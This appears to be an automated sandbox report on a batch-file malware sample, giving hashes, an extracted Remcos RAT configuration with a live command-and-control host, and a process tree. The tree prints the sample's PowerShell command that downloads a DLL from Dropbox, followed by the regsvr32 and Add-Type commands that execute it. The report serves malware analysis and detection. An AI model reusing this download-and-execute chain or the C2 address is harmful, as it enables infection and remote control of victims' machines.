Analysis
-
max time kernel
93s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2024 11:29
Static task
static1
Behavioral task
behavioral1
Sample
test-Kopie.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
test-Kopie.bat
Resource
win10v2004-20241007-en
General
-
Target
test-Kopie.bat
-
Size
1KB
-
MD5
6263640933688fcb7cec4110041065a6
-
SHA1
0915a799a48199b196c14781a5ea54a377198ac5
-
SHA256
80c404f467f93bcabea0470036ed02962f7114a12d6fb35e3fe73ab7d4045cd4
-
SHA512
de2a3aff1b9a337265c9136f9565f8c964c1e2e6d52856653ade0365f0c05a584c9d0a4b1d5af0a0552873497df966a6d5be887411aa9cbcf51388f1c9902b32
Malware Config
Extracted
remcos
RemoteHost
23.ip.gl.ply.gg:24321
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
Rmc.exe
-
copy_folder
RootRmc
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
install_path
%SystemDrive%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-M1WJOM
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 8 5108 powershell.exe 18 5108 powershell.exe -
Processes:
powershell.exepowershell.exepid Process 1368 powershell.exe 5108 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid Process 4760 regsvr32.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
regsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid Process 5108 powershell.exe 5108 powershell.exe 1368 powershell.exe 1368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exeregsvr32.exedescription pid Process procid_target PID 4480 wrote to memory of 5108 4480 cmd.exe 84 PID 4480 wrote to memory of 5108 4480 cmd.exe 84 PID 4480 wrote to memory of 2548 4480 cmd.exe 89 PID 4480 wrote to memory of 2548 4480 cmd.exe 89 PID 2548 wrote to memory of 4760 2548 regsvr32.exe 90 PID 2548 wrote to memory of 4760 2548 regsvr32.exe 90 PID 2548 wrote to memory of 4760 2548 regsvr32.exe 90 PID 4480 wrote to memory of 1368 4480 cmd.exe 91 PID 4480 wrote to memory of 1368 4480 cmd.exe 91
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test-Kopie.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/ced931yp7ygkbsx3fibr1/test.dll?rlkey=23mh4gtrl35mfqlt6suof5w8d&dl=1' -OutFile 'test.dll'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s "test.dll"2⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\regsvr32.exe/s "test.dll"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4760
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -Path 'test.dll'; [TestClass]::Execute()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
465KB
MD5c52987ac16d800661b0673db0e88e040
SHA18887a9096dd5baa81fc841fd4066978aabc66d66
SHA25600f66290090abad9e0c8a98e659723a29ad621862a54ff7b67dc326b4cf74ae6
SHA5125431218a44e0a26337b6ad78f4cf225c735a104751a542cb7d882e69ba711b3001d855199c7b91d6113eca2095257daacbb642cf1e84fa1c11e913f5d401782d